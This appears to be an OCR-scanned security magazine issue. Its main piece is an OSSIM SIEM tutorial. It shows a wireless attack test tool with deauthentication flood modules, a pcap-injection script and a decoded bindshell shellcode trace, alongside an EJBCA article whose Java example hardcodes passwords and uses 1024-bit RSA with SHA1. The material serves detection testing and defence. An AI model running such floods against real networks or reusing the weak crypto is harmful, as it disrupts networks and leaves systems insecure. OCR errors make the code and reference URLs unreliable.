The CLI is a set of tools, which can be used to 
perform the same administration actions as 
GUI. Although most of them is not so usable 
as in GUI, there can be found some examples 
where CLI is more effective. This includes is- 
suing or confirming of issuing many certifi- 
cates at once. 

Integration 

EJBCA can be used to set up a single CA as 
well as a complete PKI infrastructure. Also, it 
can be embedded in an existing PKI structure 
and easily integrated with other services. 

Thanks to cross certificates and bridge CAs it 
is possible to connect other CAs in EJBCA CA 
and vice versa. 

Similar, for integration with other services, 
Web Service interface can be used. Tasks like 
creating/deleting users, issuing/revoking cer- 
tificates and searching the database can be 
performed. An example code for creating 
user, issuing a certificate and downloading is 
presented on the following page. 

Security issues 

When comes to CA, security plays critical 
role. Compromised certificate issuer is a seri- 
ous threat to every PKI client. In case of 
EJBCA, security is achieved through 3 layers. 

First, underlying platform. Apart from standard 
operating system hardening and securing 
JBOSS application server, it includes the fire- 
wall. For incoming traffic only one or two ports 
are required to be open: 8080 and (optionally) 
8443. 

Second, SSL certificate authentication and 
authorization. It is performed when using GUI 
administration interface, and it is performed 
on both sides - server and client. In other 
words, to get the access to admin GUI, user 
has to have at least admin certificate installed 
in his web browser. 
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// EJBCA admin certyficate is required to initialize WS 
System. setProperty ( "javax.net . ssl . trustStore" , " . /admincert . jks" ) ; 
System. setProperty ( "javax.net . ssl . trustStorePassword" , "certPassword" ) ; 
System. setProperty ( "javax.net . ssl . keyStore" , " . /admincert. jks" ) ; 
System. setProperty ( "javax.net . ssl . keyStorePassword" , "certPassword" ) ; 

QName qname = new QName ( "http : //ws . protocol . core . ejbca . org/" , "E jbcaWSServ- 
ice") ; 

E jbcaWSService service = new E jbcaWSService (new 
URL ("http://sample.url") , qname) ; 
ws = service . getE jbcaWSPort () ; 

// Preparing data for CSR 

UserDataVOWS user = new UserDataVOWS () ; 

user . setUsername (username) ; 

user . setPassword ( "userPassword" ) ; 

user . setClearPwd( true) ; 

user.setSubjectDN("CN=User Data") ; 

user . setCaName ( "CAName" ) ; 

user . setEmail (null) ; 

user . setSubjectAltName (null) ; 

user . sets tatus (10) ; 

user . setTokenType ( " USERGENERATED " ) ; 

user. setEndEntityProf ileName ( "UserProf ileName" ) ; 

user . setCertif icateProf ileName ( "CertProf ileName" ) ; 



ws . editUser (userl) ; 



KeyPair keys = KeyTools . genKeys ( " 1024 " , CATokenConstants . KEYALGORITHM_RSA) ; 
// Creating CSR 

PKCSlOCertif icationRequest pkcslO = new PKCSlOCertif icationRe- 
quest ( " SHAlWi thRSA" , 

CertTools.stringToBcX509Name("CN=NOUSED") , keys . getPublic ( ) , null, 
keys . getPrivate ( ) ) ; 

// Getting the certificate from EJBCA 

Certif icateResponse certenv = ws .pkcslORequest (username , PASSWORD , 
new String (Base64 . encode (pkcslO . getEncoded ( ) ) ) , null , 
Certif icateHelper . RESPONSETYPE_CERTIFICATE) ; 

// Convert to X509Certif icate 

X509Certificate cert = (X509Certif icate) 

Certif icateHelper . getCertif icate (certenv. getData ( ) ) ; 



And the last, third layer of security, is very de- 
tailed system of rights for administrators. Sin- 
gle rights can be assigned to single adminis- 
trators. CA, RA and supervisor functionality 
are separated, as well as end-entity/certificate 
profile access rights. 

Conclusion 



conforms to broad range of standards, sup- 
ports strong algorithms and implements many 
communication protocols. It can be easily in- 
tegrated with existing structure as well as 
serve as a stand-alone solution. Its useful- 
ness can be proven by reference installations, 
such as French Ministry of Defence or Na- 
tional Swedish Police Board. 



EJBCA is open source mature software. With 
a little amount of work can be used to create 
from a single CAto the whole PKI structure. It 



The easiest way to get a feeling of EJBCA is 
the live CD, available for download from 
www.ejbca.org/download.html. 



Marcin Teodorczyk is an IT security specialist. Currently he works in Poland, at Wroclaw Center of Networking 
and Supercomputing. Contact: marcin@teodorczyk.info. 
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Advanced attack detection using OSSIM 

by Jaime Blasco and Dominique Karg 

Security Information and Event Management (SIEM) systems have changed 
the way security is administered within the enterprise. OSSIM offers all the 
necessary functionality, ranging from the detection at low-level to high-level 
reporting, security metric definition and compliance. Thanks to it's powerful 
correlation engine, OSSIM is capable of detecting complex attacks by analyz- 
ing thousands of events from different security devices. 



With over seven years of active development, 
OSSIM has become the de-facto standard in 
Open Source Security Information Manage- 
ment, with over 200,000 downloads a year 
and an installed user base exceeding 10,000 
units, which probably accounts for half of the 
installed SIEM market. And it's free. 

In this article, we'll explain the basics of how 
OSSIM works, how to initially configure and 
tune the system and how to create your own 



content to detect and analyze a wide variety of 
security issues. We'll end up explaining a 
sample attack detection scenario. 

Installation 

OSSIM installation is pretty straightforward. All 
you have to do is download the latest installer 
release from tinyurl.com/yj4pzks. At the time 
of this writing the latest release is 2.2. 
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OSSIM is provided as an easy to install CD. 
This CD can be deployed on virtual images or 
physical devices, and the whole installation 
process should take less than 30 minutes on 
standard hardware. You can find a detailed 
installation guide at tinyurl.com/yfd53xe. 

Architecture 

OSSIM collector. This component collects and 
normalizes the events generated by the differ- 
ent event sources. When you are designing 
the OSSIM architecture keep in mind that you 
can deploy as many collectors as you need in 
your environment. Usually one collector is de- 
ployed on every monitored network, especially 
if you are planning to activate IDS, vulnerabil- 
ity scanning or Netflow collection capabilities 
on collectors. 

The OSSIM collector can analyze events from 
different sources: 

•A log file (FTP, SMB, Syslog) 

• An SQL Database 

• WMI (Windows Management Instrumenta- 
tion) 

• Cisco SDEE. 



OSSIM Server. This component receives 
events from collectors and does Risk Assess- 
ment and correlation tasks. The OSSIM server 
performs the following tasks in descending or- 
der: 

• Collects events from the OSSIM detectors 

• Modifies the way events are processed 
within the server through defined policies 

• Risk Assessment 

• Event Correlation (Logical correlation, Cross- 
correlation and Inventory correlation) 

• Stores events in the SQL Database. 

Database: OSSIM databases run on a MySQL 
server and store event data, configurations 
and inventory. We strongly recommend install- 
ing the database on another machine to obtain 
better performance. 

OSSIM Framework/Interface: The OSSIM 
framework is the PHP code that serves the 
information through the Web Server. The OS- 
SIM "Frameworkd" is a Python daemon that is 
in charge of all the required tasks done peri- 
odically (Vulnerability Scanning, Backups, His- 
torical data management, graph genera- 
tion...). 
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Configuring the system 

There are some simple steps that have to be 
executed on every newly installed OSSIM sys- 
tem. First of all, try to keep it updated at all 
times by logging into the system with the 
password you've chosen at installation time 
and issuing the command "ossim-update". 
This will fetch new packages and ask you if 
you want to overwrite old files, which you'll 
want to do all the time unless you've made 
custom modifications. Let's now talk about two 
very important aspects when configuring the 
system: assets and policies. 

Assets 

Assets are key for SIEM systems. After all, if 
you don't have assets you want to protect you 
wouldn't be using a SIEM, right? OSSIM pro- 
vides four main types of IP based assets: 

• Hosts 

• Networks 

• Host groups 

• Network groups. 



alien vault 

1 Open Sou rce S I M 



Apart from this, both users and business 
processes can be considered assets within 
the system but that's out of the scope of this 
article. It is very important to correctly identify 
and evaluate your assets within OSSIM for 
two very important reasons: 

a) OSSIM is a risk-based SIEM. Every single 
event will have a risk value attached to it de- 
termined by its intrinsic "danger" (priority), how 
certain we are that it's a real event and not a 
false positive (reliability) and the importance of 
the targeted entity (asset). 

b) From a technical point of view, many inter- 
nal operations are only performed for "assets" 
- that is, for hosts or networks entered into the 
system. 

Asset values range from 0 (no importance) to 
5 (very high importance). Assets can be iden- 
tified and quickly incorporated into the system 
using the Tools -> Net Scan functionality. Use 
host and network groups to classify logically 
similar hosts/networks for later use within poli- 
cies, directives, scanning and visualization. 
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Policies 

Once you've defined your assets and events 
start pouring in, it's time to fine-tune your envi- 
ronment using policies. Policies enable you to 
decide what to do with incoming events: 

• Store them into the SQL database or into the 
logger (file system based) back-end 

• Correlate them 

• Qualify them (measure their risk) 

• Sign them cryptographically 

• Change their priority 

• Take actions like sending out an email, 
blocking at firewall level or executing any 
command. 



OSSIM policies pretty much work like your 
standard firewall policies. First you enter your 
sources (you can select any host, network or 
groups for this, additionally to entering them 
manually) and destinations. 

The next step is to define a port or port range, 
in case you want to limit the policy this way. 
Next you'll choose which events will match 
this policy - that is, you select a plugin group. 
Plugin groups can range from single events to 
multiple input device aggregations. After this, 
you've got to choose to which originating sen- 
sors it will apply and on what servers you want 
to install this policy. The last two tabs enable 
you to fine-tune your policy allowing for the 
definition of everything mentioned above 
(Storage, IPS actions, qualification, etc.) 
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Creating your own content 

OSSIM's aim is to be very flexible and to eas- 
ily adapt to different user needs. Many parts of 
the system can be customized to meet spe- 
cific requirements such as custom reports, ac- 
cepting input from new devices, correlating 
data from your own devices or using correla- 
tion algorithms defined by yourself. In this part 
we'll talk about two such customization fea- 
tures: how to accept input from a new device - 
that is, creating a custom plugin, and how to 
write new correlation rules in order to feed the 
system's "brain". 

Sample plugin 

Plugins are OSSIM's interface to external de- 
vices. Plugins allow you to easily convert any 
system's output format to a normalized state 
which will allow it to be correlated, qualified, 
stored and reported and acted upon. Events 
can be gathered by many different means, as 
seen before: 



• An SQL file with the id, name, priority and 
reliability data for each event. 

For more information about plugin creation 
along with a detailed step-by-step guide 
please visit tinyurl.com/ylmaavk. 

Sample Directive 

The correlation engine is described best at 
tinyurl.com/yk8n34o. This information is not 
completely up to date as the FIXME entries 
have already been fixed. Basically, events ar- 
rive at the correlation server(s) and are 
matched against filter rules that are described 
by a simple language using XML. Directives 
move onward as events match the different 
variables at different levels, eventually gener- 
ating new events (alarms) if a certain risk level 
has been reached. We'll see an analysis of a 
sample directive in the practical section enti- 
tled "Detecting Complex Attacks". 

Adding more components 



• By reading log files (be it locally or using 
FTP, SMB or Syslog) 

• Querying SQL Databases 

• Using WMI 

• Using Cisco SDEE 

Once you've determined the location of the 
data you want to normalize, a simple process 
follows and two files have to be created: 

• A plugin definition file containing the regular 
expressions which will match the events. 



OSSIM can be easily extended with new com- 
ponents, both open source and commercial. 
Here we'll talk about the two latest tools we've 
incorporated into the system: Wireless IDS/ 
Inventory and Netflow/Sflow storage and re- 
porting. 

Kismet 

Kismet has made its way into OSSIM very re- 
cently. The initial request was made from a 
company that wanted to help their customers 
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comply with the wireless part of the PCI regu- 
lation. We'd like to thank them for this since 
they allowed us to make most of the code 
public for the community's benefit. 

OSSIM's Kismet integration is twofold: it is 
able to detect certain "attacks" happening at 
the wireless level but also stores a list of all 
detected wireless networks, access points and 
associated clients in XML format. 

In order to try out this integration you have to 
follow these simple steps: 

1) Decide which sensor will be the Kismet col- 
lector. No OSSIM agent is required on this 
sensor, you just have to insert its IP address 
into the system and then go to advanced 
properties and mark the "Kismet" check-box. 

2) After having done so, get back to Analysis- 
>Wireless and click on the "setup" tab on the 



right. Enter your main location and you'll see 
the sensor you just flagged as having Kismet 
on the dropdown list. 

3) Enable the Kismet plugin and make sure 
you're redirecting Kismet's standard output to 
the logfile pointed inside the plugin. 

4) Run Kismet with the "-t xml" option for it to 
save periodic xml dumps. You can then import 
those xml dumps into the system by running 
the "/usr/share/OSSIM/www/wireless/ 
kismet_import.pl X.X.X.X-whatever.xml" com- 
mand. X.X.X.X is the IP address of the sensor 
you have defined before and it's very impor- 
tant that it's part of the file-name, since Kismet 
does not log this information by default. 

After this, you should be ready to go. All the 
Kismet data is available for analysis, attacks 
will be highlighted, and a subset of PCI spe- 
cific reports will be available on the Wireless 
tab. 
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Once you have your wireless sensor up and 
running, it's time to test if all is working as it 
should. In order to generate some malicious 
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wireless traffic, you can download the follow- 
ing script: 

www.alienvault.com/jblasco/code/WIDSTT.py 



mac-jaime: Downloads jaimeblascoS python WIDSTT.py 

WARNING: No route found for IPv6 destination :: (no default route?) 

WIDSTT - Wireless Intrusion Detection Systems Testing Tool Cjaime.blasco@alienvault.com) 
Usage: 

-i interface 

-m module nullProbe Send Probe- response packets with a SSID IE tag component of length 0 (WVE- 2006-0064) 

disassociateFlood Floods the WLAN with disassociation packets. (WVE-2005-0045) 

deauthFlood Floods the WLAN with deauthentication packets. (WVE-2005-0045 ) 
associateFlood Floods the WLAN with deauthentication packets. (WVE-2005-0045 ) 
invalidDeauthRcode Sends invalid deauthentication reason code. 

invalidDisasRcode Sends invalid disassociation reason code. 

longSSID Sends an over-sized SSID. (W- 2006-0071 , WVE-2007-0001) 

airJack Sends air jack beacon packet. (WVE-2005-0018) 

invalidChannellBeacon Sends an an invalid channel number in beacon frames (WVE- 2006-0950) 
windowsZero Windows XP SP1 behaviour 
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Using this tool you can send some packets via 
your wireless network adapter that will gener- 
ate Kismet alerts on each of the attacks you 
send over the air. If the sensor is well- 
configured, you should be able to find some 
Kismet alerts on the OSSIM forensics console. 
Deploying Wireless Sensors can help you 
comply with PCI DSS standard. Here is a 
short summary of the wireless requirements 
that OSSIM covers. 

Maintain an up-to-date wireless hardware in- 
ventory: OSSIM system incorporates active 
inventory through OCS deployment, passive 
host discovery via NTop, and integrates with 
Nedi to automatically perform network discov- 
ery. 

Scan for the presence of wireless access 
points / deploy a wireless IDS: The deployed 
wireless sensors allow us to detect wireless 
Access Points as well as alerts generated 
from the included Wireless Intrusion Detection 
System. 

Deploy an automatic system to alert and 
eliminate rogue devices and unauthorized 
wireless connections: The wireless sensors 
will detect non-registered Access Points. Once 
an AP is detected, the OSSIM system will 
check if the hardware is connected to the en- 
terprise network (Rogue AP) through the in- 
formation collected by NTop and Nedi. 

Isolate wireless traffic from the Cardholder 
Data Environment and monitors logs gener- 
ated and deploy an IDS/IPS: The system will 
collect, correlate and report possible attacks 
detected from wireless clients to the Card- 
holder Data environment. 

Verify that strong cryptography is being used 
on transmission of cardholder data over en- 
crypted wireless networks: The wireless sen- 
sor is capable to detect unencrypted wireless 
Access Points inside the defined wireless 
network. 

Netflow 

Since version 2.2, OSSIM accepts input from 
Netflow/SFlow capable devices using 
NFDump/SFDump. [ns]fdump accepts up to 
250k flows per second and stores them on 
file-system. 



NFSen is the basis of the OSSIM flow visuali- 
zation interface. Its basic functionality is still 
present but it has been greatly enhanced by 
adding quick links to a "Top-10" type of que- 
ries for sources, destinations and protocols, 
showing quick listings of recent activity and 
integrating the asset database with it, showing 
host names if present, adding networks to 
which hosts belong, and geolocating informa- 
tion. 

Detecting complex attacks 

To explain the capabilities of the platform, we'll 
use the pcap from the 1° Forensic Challenge 
of the Honeynet Project 
(honeynet.org/node/504). You can download 
the network trace with attack data provided 
from here: tinyurl.com/yd8axkv. 

OSSIM can help you detect this kind of at- 
tacks, as well as describe the capabilities of 
the tool to analyze, report and manage the in- 
cident response process. To begin with, we 
have to configure the system with information 
about the network (asset) as described before. 
If we take take a look at the pcap file we can 
easily discover that the victim network is 
192.150.0.0/16 and the attacked system IP 
address is 1 92. 1 50. 1 1 . 1 1 1 . So, we add the 
network to OSSIM at Assets->Networks (Win- 
dowsNetwork) and the host under Assets- 
>Hosts (Windows-File-Server). 

Then, if we execute the OSSIM-reconfig 
command, the OSSIM agents will update the 
networks to monitor (HOME_NETWORK) and 
Snort will be able to detect attacks against it. 
Now we have to inject the pcap file into the 
interface which Snort is analyzing traffic to 
emulate the attack, and let the platform ana- 
lyze it. We propose two methods: 

• Using Tcpreplay: A tool that "replays" pcap 
files onto the network. To inject the Honeynet 
Forensic Challenge Pcap file (assuming Snort 
is listening on ethO): 

tcpreplay --intfl=ethO 
attack- trace . pcap_ 

• Using Scapy: If you are running OSSIM/ 
Snort on Vmware or any other virtual envi- 
ronment, you can sometimes encounter prob- 
lems injecting pcap files with Tcpreplay. To 
solve this you can use this little Python script 
that uses Scapy to inject a pcap file onto the 
network. 
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Note: You need to have scapy installed: 



apt-get install scapy 

import sys 

from scapy import * 

pcapFile = sys.argvfl] 
interface = sys.argv[2] 

for p in rdpcap (pcapFile) : 

sendp(p, iface=interface, loop=0, verbose=0) 

print "Injected %s on %s" % (pcapFile, interface) 

Once we have injected the pcap file on the wire, let check the Analysis->SIEM tab to see what the 
system has detected. 

> Displaying cv&nls 1 -9 of 9 total 
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Through the SIEM analysis console, we can 
visualize the information processed by the 
system. We can observe the following suspi- 
cious events: 

• A machine from an external network access- 
ing "IPC$ share" on "Windows-File-Server" 
computer 

• IDS events indicating an attempt to exploit 
CVE-2003-0533 vulnerability 

• IDS detecting a possible shellcode in the 
communication 

• Affected Windows server receiving a binary 
file from an attacker. 



Aside from the suspicious events, we show a 
risk 2 "directive_event" that indicates that OS- 
SIM has correlated the events and has gener- 
ated an alarm, as shown below - Incidents- 
>Alarm panel. 

The system has detected an event that may 
indicate an exploit attempt against the system, 
followed by a shellcode IDS event. The at- 
tacker has sent a binary file to the victim and 
OSSIM has identicated a "Worm Infection 
against Windows-File-Server via Lsasrv.dll 
RPC vulnerability" taking place. Let's click on 
View/Edit current directive definition to under- 
stand how the correlation rule works. 
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Worm Infection against D£T_XPvia Lsasrv.dll RPC vulnerability 
Directive 6013 (Priority: 3 ) 
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200S576 2008509 2009019 20QB3-U 2D082B5 

200B557 2008575 20D9080 2007671 2009033 

2009035 2009033 2009034 2009035 2000419 

2008575 2008509 2009019 200B341 20O82B5 

200B557 2008575 2009080 2007671 2009033 

2009035 2009033 2009034 2009035 2000419 
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Analyzing the directive definition, we can see 
that the first level of the correlation rule is 
"Lsasrv.dll RPC exploit". A correlation backlog 
will be created when an event from plugin_id 
1001 (Snort) and plugin_sid specified in the 
plugin_sid field comes from any source to any 
destination. The second level "Shellcode De- 
tected" will increase the reliability value by 1 
when the IDS detects a shellcode pattern from 
the same source of the first rule level 
(1 :SRC_IP) to the same destination of the first 
level (1 :DST_IP) in less that 10 seconds. 

Once the second level is reached, the correla- 
tion has several possible paths to follow in 
less than 10 seconds. For example: 

• ATFTP connection is established followed by 
an executable file being transferred to the vic- 
tim host increasing rule's reliability by 10 

• A new connection is opened between the vic- 
tim and the attacker followed by a executable 
file being transferred to the victim host in- 
creasing the reliability by 10 

• An executable file is transmitted between vic- 
tim and attacker. 



In the same window we can observe general 
information about the directive: 

• Properties: Targeted/Non-targeted attack, 
attack phase (approach, exploration, penetra- 
tion), impacts (QOS, Infleak, Lawful, Image, 
Financial, Availability, Integrity, Confidential- 
ity).... 

• ISO27001 affected controls: 

o A. 10.4.1 Controls against malicious 

code 

• PCI affected controls: 

o R. 5.1 Deploy anti-virus software on all 
systems commonly affected by viruses 

o R. 5. 1.1 Ensure that anti-virus programs 
are capable of detecting, removing, and pro- 
tecting 

o Ensure that all anti-virus mechanisms 
are current, actively running, and capable of 
generating alarms. 

We can also look up the directive explanation 
and find more references by clicking on the 
KDB (Knowledge Database) link. 



Date 

2010-03-10 

User 
admin 
Keywords 

Attachments 

Links 

6013 directive 



Description: 

A possible worm has been identified infecting computers insde the corporate network exploiting M5D4-QL1 
vulnerability. A malicious shellcode followed by suspicicjs connections nay ndicate an infection. 



- Install AntiSpyvva re Software. 

- Install an up-to-date Antivirus Software. 

- Enable a firewall on the computer 

References: 

* FULLDI5C:2DQ40413 EEYE: Windows Local Security Authority Service Remote Buffer Overflew 
" URL:http://lisrts.grok.org.uk;pipermail/full-di5clcsure/2004-Aprii;D20069.hnTil 

* EEYE:AD2D040413C 

* URLthttp ://www.eeye. com/html.' Resea rch/Advi5ories/AD2rj(M04 1 3C.htm I 

* BJGTHAQ: 20040429 M 50^0 1 1 Lsasrv, rJII RPC buPer overflew remote exploit { PoCJ 

* URL:http://marc.theaimsgroup.com/?l=bugtraq&.m= lQB325B5.M31471Siw=2 
" MS:MS04-011 

* U RLthTtp ://www. m icrosoft .com ,'techr et/sec j ity,' d jI let n/m sO^-Q 1 1 . mspx 

* CERTtTA04-lMA 

* U RL:http ://wwv.\ us-cert.gov/ca s/techale ts/TAOI-l MA.html 

* CERT-vN;VU#753212 

* U RLthttp ://www. kb.cert.org/vuls/idj7 53212 

* CIAC;0-114 

* URLthttp://wv, , v. , .ciac.crg/ciac 1 ''bul etns/o-l:4.shtml 
" BID; 10108 

* URL:hrop://wv.v.\5ecurir^r:u5.r:Dni/birJ/10irj8 

* OVAL icvaLorc, . mitre .oval ; def ;B53 

* URL:hhp://oval.mih , e.org/rep't:t: ':orj , . : C'a:c;^5tDef?id=cval:or5.rr'itre.cval:def:BB3 

* QVALvovaltorg^mitre .oval: def :B98 

* URL:hrr£://ovai.mi1re.org/repo"oiY-'^ 

* OVAL ;cval:orC;. mitre. oval; def :919 

* U RLthttp ://oval.mih , e.org/rep't:"i^^ 
" XF:win-lsB5s-bo(15699) 
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Now is time to gather more information about 
how the attack happened and what it did. We 
know that the attacker most likely used a re- 
motely exploitable buffer overrun vulnerability. 
Open the Shellcode event from the analysis 



console or from the alarm panel. Once 
opened, we can click on the left side of the 
packet raw data the "Shellcode analysis" link 
that will interpret the shellcode data and let us 
understand easily what the shellcode does: 



ExitThread(O) 
stepcount 7479 

FARPROC WINAPI GetProcAddress ( 
HMODULE hModule = 0x7c800000 => 
none ; 

LPCSTR lpProcName = 0x00417258 => 
= "CreateProcessA" ; 
) = 0x7c802367; 

FARPROC WINAPI GetProcAddress ( 
HMODULE hModule = 0x7c800000 => 
none ; 

LPCSTR lpProcName = 0x00417267 => 
= "ExitThread" ; 
) = 0x7c80c058; 

FARPROC WINAPI GetProcAddress ( 
HMODULE hModule = 0x7c800000 => 
none ; 

LPCSTR lpProcName = 0x00417272 => 

= "LoadLibraryA" ; 

) = 0x7c801d77; 

HMODULE LoadLibraryA ( 

LPCTSTR lpFileName = 0x0041727f => 

= "ws2_32"; 

) = 0x71al0000; 

FARPROC WINAPI GetProcAddress ( 
HMODULE hModule = 0x71al0000 => 
none ; 

LPCSTR lpProcName = 0x00417286 => 
= "WSASocketA" ; 
) = 0x71al8769; 

FARPROC WINAPI GetProcAddress ( 
HMODULE hModule = 0x71al0000 => 
none ; 

LPCSTR lpProcName = 0x00417291 => 

= "bind"; 

) = 0x71al3e00; 

FARPROC WINAPI GetProcAddress ( 
HMODULE hModule = 0x71al0000 => 
none ; 

LPCSTR lpProcName = 0x00417296 => 

= "listen"; 

) = 0x71al88d3; 

FARPROC WINAPI GetProcAddress ( 
HMODULE hModule = 0x71al0000 => 
none ; 

LPCSTR lpProcName = 0x004172 9d => 

= "accept"; 

) = 0x71a21028; 

FARPROC WINAPI GetProcAddress ( 
HMODULE hModule = 0x71al0000 => 
none ; 

LPCSTR lpProcName = 0x004172a4 => 
= "closesocket" ; 
) = 0x71al9639; 
SOCKET WSASocket ( 
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int af = 2; 
int type = 1 ; 
int protocol = 0 ; 

LPWSAPROTOCOL_INFO lpProtocolInf o = 0; 

GROUP g = 0; 

DWORD dwFlags = 0; 

) = 66; 

int bind ( 

SOCKET s = 66; 

struct sockaddr_in * name = 0x00417269 => 
struct = { 

short sin_family = 2; 

unsigned short sin_jport = 42247 (port=1957) ; 

struct in_addr sin_addr = { 

unsigned long s_addr = 0 (host=0 . 0 . 0 . 0) ; 

}; 

char sin_zero = " " ; 

}; 

int namelen = 16; 
) = 0; 

int listen ( 
SOCKET s = 66; 
int backlog = 1; 
) = 0; 

SOCKET accept ( 
SOCKET s = 66; 

struct sockaddr * addr = 0x00000000 => 
struct = { 

}; 

int addrlen = 0x00000000 => 
none ; 
) =68; 

BOOL CreateProcess ( 

LPCWSTR pszImageName = 0x00000000 => 
= "g_"; 

LPCWSTR pszCmdLine = 0x004172a5 => 
= "cmd"; 

LPSECURITY_ATTRIBUTES psaProcess = 0x00000000 => 
none ; 

LPSECURITY_ATTRIBUTES psaThread = 0x00000000 => 
none ; 

BOOL f InheritHandles = 1; 
DWORD fdwCreate = 0; 

LPVOID pvEnvironment = 0x00000000 => 
none ; 

LPWSTR pszCurDir = 0x00000000 => 
none ; 

struct LPSTARTUPINFOW psiStartlnfo = 0x0012fe54 => 

struct = { 

DWORD cb = 0; 

LPTSTR lpReserved = 0 ; 

LPTSTR lpDesktop = 0; 

LPTSTR lpTitle = 0; 

DWORD dwX = 0; 

DWORD dwY = 0; 

DWORD dwXSize = 0; 

DWORD dwYSize = 0; 

DWORD dwXCountChars = 0; 

DWORD dwYCountChars = 0; 

DWORD dwFillAttribute = 0; 

DWORD dwFlags = 0; 

WORD wShowWindow = 0; 

WORD cbReserved2 = 0; 

LPBYTE lpReserved2 = 0; 
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HANDLE hStdlnput = 68; 
HANDLE hStdOutput = 68; 
HANDLE hStdError = 68; 

}; 

struct PROCESS_INFORMATION pProcInfo = 0x0052f74c => 
struct = { 

HANDLE hProcess = 4711; 
HANDLE hThread = 4712; 
DWORD dwProcessId = 4712; 
DWORD dwThreadld = 4714; 

}; 

) = -1; 

int closesocket ( 
SOCKET s = 68; 
) = 0; 

int closesocket ( 
SOCKET s = 66; 
) = 0; 

void ExitThread ( 
DWORD dwExitCode = 0; 
) = 0; 



As we can see, the shellcode is a bindshell on 
port 1 957. We can observed the connection to 
the bind port from the attacker clicking the 
right mouse button->Traffic on the attacker IP. 



Thanks to Netflow Data we are able to ob- 
serve all the connections where the attacker 
was involved. 
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Conclusion 

Our hope is that after having seen an over- 
view of the system along with an explanation 
of how a complex attack can be detected and 
analyzed using OSSIM, the reader will want to 
try this out in his own environment, detecting 



real attacks and threats to his network and 
hosts. 

We encourage anyone who feels that way and 
is as excited about it as we are, to download 
OSSIM from tinyurl.com/yj4pzks and test it. 
After all, it's free. 



This article has been written jointly by Jaime Blasco (jaime.blasco@alienvault.com, twitter: jaimeblascob), 
leader of the Vulnerability Research Team at AlienVault and Dominique Karg (dk@alienvault.com, twitter: 
dkarg), lead developer of OSSIM and co-founder of AlienVault. 
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REFOG Personal Monitor (www.net-security.org/software.php?id=77l) 

REFOG Personal Monitor integrates several tools to ensure thorough monitoring of computer sys- 
tems. It keeps track of every word or keystroke command entered by a user. It also monitors the 
Clipboard and records all pasted items. The program logs active applications and window cap- 
tions. Every entry in the log has a time stamp so that you can trace user activity minute by minute. 



IM Lock Professional (www. net-security.org/software. php?id=768) 

IM Lock Professional controls and blocks access to web pages, and other types of internet use 
like MSN Messenger. You can also block popular peer-to-peer file sharing programs, and individ- 
ual web sites. 



PeerGuardian (www. net-security.org/software. php?id=767) 

PeerGuardian is a security tool for P2P clients, Phoenix Labs' premier IP blocker for OS X. It inte- 
grates support for multiple lists, list editing, automatic updates, and blocking all of IPv4 (TCP, UDP, 
ICMP, etc), making it an easy and safe way to protect your privacy on P2P. 



Internet Access Controller (www.net-security.org/software.php?id=765) 

Internet Access Controller is a program for controlling, blocking and restricting internet and net- 
work access. From blocking or allowing web sites, filtering ports and IP addresses to complete 
scheduling of user access to the web, Internet Access Controller has it all. 
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Working with identities within your organization is based on known methods 
and familiar concepts of authentication and dealing with digital identities. But, 
in a globally connected world, that is a totally different story. Claims-based 
security and authentication proposes to solve some traditional problems 
when it comes to working with identities in an Internet world. With the "Ge- 
neva" platform, Microsoft developed a framework that is built upon the con- 
cept of claims-based security. The question is: will claims-based security be 
able to solve the problems concerning "federated identities", or will it prove to 
be just a hype? 



Working with users and their digital identities 
is always a challenge. In this article, we'll be 
discussing claims-based security in general, 
but we will also consider how it can be im- 
plemented by using Active Directory Federa- 
tion Services 2.0 and the identity framework 
solutions offered by Microsoft. 

The traditional environment 

Most organizations employing the traditional 
model treat the internal user as part of their 
managed security realm. The identities are 



tied to a platform or have some sort of secu- 
rity boundary. Simple authentication is used: 
account name and password. 

In a traditional environment, the Windows 
platform uses the Active Directory Domain 
Services (ADDS) as a centralized storage and 
validation platform. The Active Directory 
stores the end-user accounts and the specific 
rights granted to him or her, based on group 
membership. This takes care of the issue of 
access to resources. 
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In a Microsoft environment, a domain control- 
ler authenticates the user and creates a Ker- 
beros ticket/token if valid credentials are sup- 
plied and the authentication process is suc- 
cessful. The ticket is valid during the session 
and will be used to access resources such as 
applications, services and servers. Included in 
the tickets are the so-called Privilege Attribute 
Certificates (PACs), and they contain the in- 
formation needed for the user to gain access 
to resources. 

The Security ID (SID) and the rights granted 
through group membership (group member- 
ship SIDs) can also be found within. If the 
user logs off, the session will be terminated 
and the ticket will no longer be valid. A service 
that uses Windows integrated authentication 
within your domain receives a Kerberos ticket 
and is, in most cases, part of the security 
realm. Kerberos is placed centrally as a vali- 
dation service and is trusted by the members 
of that security domain. 

Identity silos 

The previous example illustrated how identi- 
ties are managed by individual organizations 
(or departments within them) and how, in do- 
ing so, they create identity silos. Different sys- 
tems, platforms and departments within the 
organization deal with identities in their own 
unique way. The identity itself and all the in- 
formation that is tied to it is stored (most of 
the time) in a local directory service or data- 
base. 

In this day and age, bigger companies use a 
large number of (web) applications and serv- 
ices, many of which store identities separately 
and the authentication can be executed on 
both the application and the infrastructure 
level. 

As users, we are forced to fill in the same 
forms over and over again, but are encour- 
aged to use different usernames and pass- 
words. The situation on the Internet is similar 
- time and again we have to provide the 
same sort of information in order to gain the 
permission to use different online services. 
Name, address, date of birth, gender... Every 
organization has its own method for register- 
ing users, and that is very inconvenient for 
customers. 



Identity mess 

The traditional borders and defense lines of 
organizations have shifted. If we want to grant 
access to our application, the internally based 
identity will work just fine in most cases. But, 
what if we want to outsource some of the 
work conducted by the call center, or we want 
to provide our customers with a self-service 
portal for taking care of their profile and man- 
aging specific services online? Right. It is the 
same application, but totally different scenar- 
ios. 

Besides, this can be the same user and per- 
son using different digital identities. People 
can be employees as well as customers. Cus- 
tomers can also delegate tasks to - for exam- 
ple - a financial advisor for things they're not 
good at. Besides all this, there are some pri- 
vacy issues and related questions. Most us- 
ers like to manage their own identity (identi- 
ties) in the digital world, providing just the 
right data and details to get access to specific 
services and applications. This concept is 
called user centric identity management. 

A lot of organizations have to spend a sub- 
stantial part of their budget to address identity 
management. Sometimes, the result is a digi- 
tal ID crisis. We might conclude that it's not 
realistic anymore to try to set up and manage 
all this internally. 

Cross the border: Federation 

In the previously mentioned scenario, giving 
controlled access and dealing with identities 
from both internal and external sources intro- 
duces a new set of challenges. A local Active 
Directory doesn't fit in this picture anymore. If 
we want to manage this, we have to change 
our way of thinking and maybe even trust 
partners or external ID service providers. 
Trust is really the keyword here and this is 
certainly not a technical game. Ultimately, this 
means having faith in a (business) partner 
and their procedures for handling identities. If 
we trust that partner, we can maybe trust 
specific users or services from that organiza- 
tion or digital identities provided by them. And 
